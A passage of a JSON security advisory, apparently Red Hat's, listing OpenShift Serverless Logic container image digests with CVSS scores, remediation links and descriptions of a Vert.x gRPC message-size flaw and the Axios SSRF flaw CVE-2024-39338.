"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
